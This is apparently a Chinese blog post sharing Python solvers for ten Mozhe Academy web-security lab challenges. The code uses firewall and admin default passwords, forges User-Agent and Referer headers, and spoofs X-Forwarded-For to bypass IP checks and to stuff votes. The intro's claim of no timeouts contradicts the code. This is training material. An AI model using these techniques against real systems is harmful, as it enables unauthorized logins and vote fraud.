前言:
墨者学院是一个用于安全学习的网站,其中的在线网络安全攻防技能实训靶场极具特色。
- 最近做了一下网络安全类的题,但只靠 Burp Suite 手工操作不够过瘾,于是决定写一个自动解题的程序。
链接:https://pan.baidu.com/s/1yhE5395g12xvkv4F1FGvyA
提取码:mvjr
简单演示:
- 进入一个靶场,并启动环境
- 启动InsectBaby.exe,并依次填入对应的题号、IP、端口(网盘里的 exe 无法核验来源,更稳妥的做法是直接用下面的源码运行,或先在隔离环境中检查后再执行)
- 随后提交输出的key值即可
- 除了几道靠刷请求的题需要30~60秒,其他的都是秒解,所以在座的速度之王们还在等什么?
- 如果实在太久,有可能是请求阻塞了(源码里的请求没有设置超时,失败时还会无限重试),建议重新运行一下程序
源码:
#某防火墙默认口令
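def topic_1(ip, port):
    """Solve "default password of a certain firewall".

    Posts a vendor default account to ``/login.php`` and scrapes the key the
    lab prints after a successful login.

    Args:
        ip: host of the running lab instance.
        port: port of the running lab instance.

    Returns:
        The key string, or ``None`` when the server does not answer 200 or the
        page carries no ``KEY:`` marker (e.g. the login was rejected).
    """
    url = "http://{}:{}/login.php".format(ip, port)
    # Browser-like headers from a captured login request. Content-Length is
    # intentionally not set by hand: requests derives it from the encoded
    # body, so a hard-coded value is at best redundant and at worst stale.
    # NOTE(review): PHPSESSID and the ``verification`` cookie are fixed values
    # copied from one captured session; the lab apparently accepts them for
    # any instance -- confirm before depending on this against a fresh target.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://{}:{}".format(ip, port),
        "Connection": "close",
        "Referer": "http://{}:{}/login.html".format(ip, port),
        "Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6; verification=89a5b242c7f88765bd270c6cce92328f",
        "Upgrade-Insecure-Requests": "1",
    }
    # Vendor default credentials (from a product default-password collection).
    data = {
        "usr": "useradmin",
        "pwd": "venus.user",
        "validate": "t2fa",
        "language": "1",
    }
    # Explicit (connect, read) timeout: without one a stalled instance hangs
    # the solver forever.
    response = requests.post(url=url, headers=headers, data=data, timeout=(30, 50))
    if response.status_code != 200:
        return None
    body = response.content.decode("utf-8")
    # The key sits between blank lines inside a <p>. re.search avoids the
    # IndexError that ``findall(...)[0]`` raised when the marker was absent.
    match = re.search(r"KEY:\n\n(.*?)\n\n</p>", body)
    return match.group(1) if match else None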
#浏览器信息伪造
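def topic_2(ip, port):
    """Solve "browser information forgery".

    Fetches ``mp_weixin_qq_com.php`` with a WeChat in-app browser User-Agent.
    The page evidently gates on the User-Agent, which is client-supplied and
    therefore not an access control.

    Args:
        ip: host of the running lab instance.
        port: port of the running lab instance.

    Returns:
        The decoded page body (which contains the key) on a 200 response,
        otherwise ``None``.
    """
    host = "http://{}:{}/".format(ip, port)
    url = host + "mp_weixin_qq_com.php"
    # Forged User-Agent: MicroMessenger on iOS.
    headers = {
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Referer": host,
        "Upgrade-Insecure-Requests": "1",
    }
    # Explicit timeout so an unresponsive instance cannot hang the solver.
    response = requests.get(url=url, headers=headers, timeout=(30, 50))
    if response.status_code != 200:
        return None
    return response.content.decode("utf-8")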
#HTTP动作练习
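def topic_3(ip, port):
    """Solve "HTTP method practice".

    Reads the ``content=`` query value from the first ``weui_media_title``
    link on the index page and re-submits it to ``info.php`` as a POST body.

    Args:
        ip: host of the running lab instance.
        port: port of the running lab instance.

    Returns:
        The decoded response body of the POST (which contains the key) on a
        200 response; ``None`` when the index page is not reachable, has no
        matching link, or the POST is not answered with 200.
    """
    base_url = "http://{}:{}/".format(ip, port)
    # The original capture POSTed to "/" + "//info.php"; the path is kept
    # verbatim because the lab evidently tolerates the repeated slash.
    key_url = base_url + "//info.php"
    # Referer is built from the target rather than the stale instance address
    # (124.70.71.251:46166) the original had copied from its own session.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Referer": base_url,
        "Upgrade-Insecure-Requests": "1",
    }
    index = requests.get(url=base_url, headers=headers, timeout=(30, 50))
    if index.status_code != 200:
        return None
    soup = BeautifulSoup(index.content.decode("utf-8"), "html.parser")
    titles = soup.select('h4[class="weui_media_title"]')
    if not titles:
        return None
    # Cut the raw ``content=`` value out of the serialised <a href="...">.
    # Working on the serialised tag (not tag.a["href"]) sends the value
    # byte-for-byte as it appears in the page, which is what the original
    # string-replace approach did -- but without depending on the exact link
    # text ("静夜思") and style attribute, which silently corrupted the value
    # whenever they differed.
    serialised = str(titles[0])
    context = serialised.partition("content=")[2].partition('"')[0]
    if not context:
        return None
    data = {"content": context}
    # Content-Length is left to requests, which computes it from the body.
    headers["Content-Type"] = "application/x-www-form-urlencoded"
    response = requests.post(url=key_url, headers=headers, data=data, timeout=(30, 50))
    if response.status_code != 200:
        return None
    return response.content.decode("utf-8")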
#热点评论刷分漏洞分析溯源
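# Shared pieces for the ballot-stuffing labs (topics 4, 5 and 7). The three
# endpoints differ only in path, vote id, user agent, cookie, loop bound and
# key marker, so the mechanics live in one helper instead of three copies.

_FIREFOX_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) "
               "Gecko/20100101 Firefox/117.0")
_WECHAT_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) "
              "AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 "
              "MicroMessenger/6.0 NetType/WIFI")
_ACCEPT_LANGUAGE = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
# (connect, read) timeout in seconds. The original applied it only to the
# looped votes; the final vote and the page fetches could hang forever.
_TIMEOUT = (30, 50)
# Retry budget per vote: 12 attempts x 5 s sleep is about a minute, after
# which the instance is almost certainly dead and restarting it is the fix.
_MAX_ATTEMPTS = 12


def _xhr_headers(ip, port, referer, user_agent, cookie=None):
    """Return the XMLHttpRequest-style header set the vote endpoints receive.

    ``X-FORWARDED-FOR`` starts empty and is overwritten per vote by the
    caller. Content-Length is left to requests, which computes it from the
    body, instead of the hard-coded "4" the captured request carried.
    """
    headers = {
        "User-Agent": user_agent,
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": _ACCEPT_LANGUAGE,
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": "http://{}:{}".format(ip, port),
        "X-FORWARDED-FOR": "",
        "Connection": "close",
        "Referer": referer,
    }
    if cookie is not None:
        # NOTE(review): a PHPSESSID captured from one session; the lab
        # presumably does not bind votes to it -- verify on a fresh instance.
        headers["Cookie"] = cookie
    return headers


def _post_vote(url, headers, data):
    """POST one vote, retrying transport failures within a bounded budget.

    Only ``requests.RequestException`` is retried. The original bare
    ``except:`` also swallowed KeyboardInterrupt, so the solver could not be
    stopped, and it retried forever. ``verify=False`` is dropped: the target
    is plain http, where it had no effect.

    Returns:
        The ``requests.Response`` of the successful attempt.

    Raises:
        RuntimeError: when every attempt fails.
    """
    for _attempt in range(_MAX_ATTEMPTS):
        try:
            return requests.post(url=url, headers=headers, data=data, timeout=_TIMEOUT)
        except requests.RequestException:
            print("\r{}".format("●"), end="")
            time.sleep(5)
    raise RuntimeError(
        "vote request to {} failed {} times; restart the lab instance".format(url, _MAX_ATTEMPTS)
    )


def _stuff_ballots(ip, port, vote_path, page_path, vote_id, user_agent,
                   cookie, last_octet_stop, final_ip, key_pattern):
    """Cast one vote per spoofed client address, then scrape the key.

    The target apparently limits each client IP to one vote but reads that IP
    from ``X-Forwarded-For``, a header any client can set. That is the
    weakness these labs demonstrate: the header is only trustworthy when a
    reverse proxy the application itself controls overwrites it.

    Votes are cast from 192.168.1.101 .. 192.168.2.(last_octet_stop - 1) and
    then once more from ``final_ip`` (the "one vote short" the original solver
    adds), after which ``page_path`` is fetched and searched for the key.

    Returns:
        Group 1 of the first ``key_pattern`` match, or ``None`` when the vote
        page is not reachable (non-200) or carries no key.
    """
    vote_url = "http://{}:{}/{}".format(ip, port, vote_path)
    page_url = "http://{}:{}/{}".format(ip, port, page_path)
    plain_headers = {"User-Agent": _FIREFOX_UA}
    probe = requests.get(url=page_url, headers=plain_headers, timeout=_TIMEOUT)
    if probe.status_code != 200:
        return None
    data = {"id": vote_id}
    headers = _xhr_headers(ip, port, page_url, user_agent, cookie)
    for third_octet in (1, 2):
        for fourth_octet in range(101, last_octet_stop):
            headers["X-FORWARDED-FOR"] = "192.168.{}.{}".format(third_octet, fourth_octet)
            _post_vote(vote_url, headers, data)
            print("\r正在解题,请耐心等待", end="")
    # One extra vote from a fresh address to cross the finish line.
    headers["X-FORWARDED-FOR"] = final_ip
    _post_vote(vote_url, headers, data)
    page = requests.get(url=page_url, headers=plain_headers, timeout=_TIMEOUT)
    match = re.search(key_pattern, page.content.decode("utf-8"))
    return match.group(1) if match else None


def topic_4(ip, port):
    """Solve "hot-comment like-count inflation" (like_do.php / news_comment.php).

    Returns the key string, or ``None`` if the page is unreachable or has no
    ``KEY:`` marker.
    """
    return _stuff_ballots(ip, port, "like_do.php", "news_comment.php", "7",
                          _FIREFOX_UA, None, 211, "192.168.2.212", r"KEY:(.*?)'")


def topic_5(ip, port):
    """Solve "common voting vulnerabilities" (wx_vote_do.php / wx_vote.php).

    Votes are sent with a WeChat User-Agent and the captured PHPSESSID.
    Returns the key string, or ``None`` if the page is unreachable or has no
    ``key:`` marker.
    """
    return _stuff_ballots(ip, port, "wx_vote_do.php", "wx_vote.php", "6",
                          _WECHAT_UA, "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6",
                          247, "192.168.2.247", r"key:(.*?)'")


def topic_6(ip, port):
    """Solve "Referer forgery": fetch the search page with a forged Referer.

    The page evidently gates on the Referer header, which is client-supplied
    and therefore no access control at all.

    Prints the page body and returns ``True`` on a 200 response; returns
    ``None`` otherwise. Printing rather than returning the key mirrors the
    original interface.
    """
    url = "http://{}:{}/x_search_index.php".format(ip, port)
    headers = {
        "User-Agent": _FIREFOX_UA,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": _ACCEPT_LANGUAGE,
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Referer": "http://google.com",  # forged referer
        "Upgrade-Insecure-Requests": "1",
    }
    response = requests.get(url=url, headers=headers, timeout=_TIMEOUT)
    if response.status_code != 200:
        return None
    print(response.content.decode("utf-8"))
    return True


def topic_7(ip, port):
    """Solve "voting system design flaw" (vote_do.php / vote.php).

    Returns the key string, or ``None`` if the page is unreachable or has no
    ``key:`` marker.
    """
    return _stuff_ballots(ip, port, "vote_do.php", "vote.php", "7",
                          _FIREFOX_UA, None, 232, "192.168.2.232", r"key:(.*?)'")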
#IP地址伪造(第1题)
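def topic_8(ip, port):
    """Solve "IP address forgery (part 1)".

    Logs in with ``admin``/``admin`` while claiming to come from
    ``127.0.0.1`` via ``X-Forwarded-For``. The lab evidently treats that
    header as the client address for its loopback-only check; the header is
    client-controlled unless the server's own reverse proxy sets it.

    Args:
        ip: host of the running lab instance.
        port: port of the running lab instance.

    Returns:
        ``True`` after printing the page body on a 200 response, otherwise
        ``None`` (printing rather than returning the key mirrors the original
        interface).
    """
    url = "http://{}:{}/login.php".format(ip, port)
    # Content-Length is left to requests, which computes it from the body.
    # NOTE(review): the PHPSESSID is a fixed value from one captured session;
    # the lab presumably ignores it -- verify on a fresh instance.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://{}:{}".format(ip, port),
        "X-FORWARDED-FOR": "127.0.0.1",
        "Connection": "close",
        "Referer": "http://{}:{}/".format(ip, port),
        "Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6",
        "Upgrade-Insecure-Requests": "1",
    }
    # Default credentials (from a product default-password collection).
    data = {
        "action": "login",
        "user_name": "admin",
        "Password": "admin",
    }
    # Explicit timeout so an unresponsive instance cannot hang the solver.
    response = requests.post(url=url, headers=headers, data=data, timeout=(30, 50))
    if response.status_code != 200:
        return None
    print(response.content.decode("utf-8"))
    return True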
#IP地址伪造(第2题)
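def topic_9(ip, port):
    """Solve "IP address forgery (part 2)".

    Logs in with the weak credentials ``test``/``test`` (found by brute force
    in Burp) while claiming a specific source address via ``X-Forwarded-For``.
    The hard-coded ``59.125.39.5`` is presumably the address the challenge
    expects -- it comes from the original author's solve, not from anything
    derived here.

    Args:
        ip: host of the running lab instance.
        port: port of the running lab instance.

    Returns:
        ``True`` after printing the page body on a 200 response, otherwise
        ``None`` (printing rather than returning the key mirrors the original
        interface).
    """
    url = "http://{}:{}/login.php".format(ip, port)
    # Content-Length is left to requests, which computes it from the body.
    # NOTE(review): the PHPSESSID is a fixed value from one captured session;
    # the lab presumably ignores it -- verify on a fresh instance.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://{}:{}".format(ip, port),
        "X-FORWARDED-FOR": "59.125.39.5",
        "Connection": "close",
        "Referer": "http://{}:{}/".format(ip, port),
        "Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6",
        "Upgrade-Insecure-Requests": "1",
    }
    # Weak credentials recovered with Burp in the original write-up.
    data = {
        "action": "login",
        "user_name": "test",
        "Password": "test",
    }
    # Explicit timeout so an unresponsive instance cannot hang the solver.
    response = requests.post(url=url, headers=headers, data=data, timeout=(30, 50))
    if response.status_code != 200:
        return None
    print(response.content.decode("utf-8"))
    return True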
#服务器返回数据查看
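def topic_10(ip, port):
    """Solve "inspect the server's returned data".

    POSTs ``boolean=false`` to the site root; the key is carried in a response
    header named ``key`` rather than in the body.

    Args:
        ip: host of the running lab instance.
        port: port of the running lab instance.

    Returns:
        The value of the ``key`` response header, or ``None`` when the
        response is not 200 or has no such header. ``headers.get`` replaces
        the original ``headers['key']``, which raised KeyError on a miss.
    """
    url = "http://{}:{}/".format(ip, port)
    # Content-Length is left to requests, which computes it from the body.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://{}:{}".format(ip, port),
        "Connection": "close",
        "Referer": "http://{}:{}/".format(ip, port),
        "Upgrade-Insecure-Requests": "1",
    }
    data = {"boolean": "false"}
    # Explicit timeout so an unresponsive instance cannot hang the solver.
    response = requests.post(url=url, headers=headers, data=data, timeout=(30, 50))
    if response.status_code != 200:
        return None
    # requests' header mapping is case-insensitive, so "key"/"Key" both hit.
    return response.headers.get("key")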